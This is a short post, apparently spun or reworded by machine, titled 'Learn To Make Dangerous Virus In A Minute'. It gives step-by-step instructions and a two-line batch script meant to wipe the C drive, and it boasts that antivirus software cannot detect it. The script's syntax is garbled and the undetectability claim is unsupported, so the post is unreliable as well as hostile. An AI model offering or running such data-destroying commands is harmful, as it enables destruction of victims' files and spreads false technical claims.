Learn To Make Dangerous Virus In A Minute
In this post i will teach you toward make simple yet very powerful or you can say harmful computer virus using a batch file. No software is required toward make this virus, Notepad is enough beneficial to it. The good thing about this virus is it is not detected by any Anti Virus.What will this virus do ?
You will create this virus using batch file programming. This virus will delete the C driver completely. The good thing about this virus is that it is not detected by antivirus.
How toward Make the Virus ?
1. Open Notepad furthermore copy below code into it.
Code:
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all content regarding C Drive.
Warning: Please don't try toward run at your own computer or else it will delete all the content regarding your C Drive. I will not be responsible beneficial to any damage done toward your computer.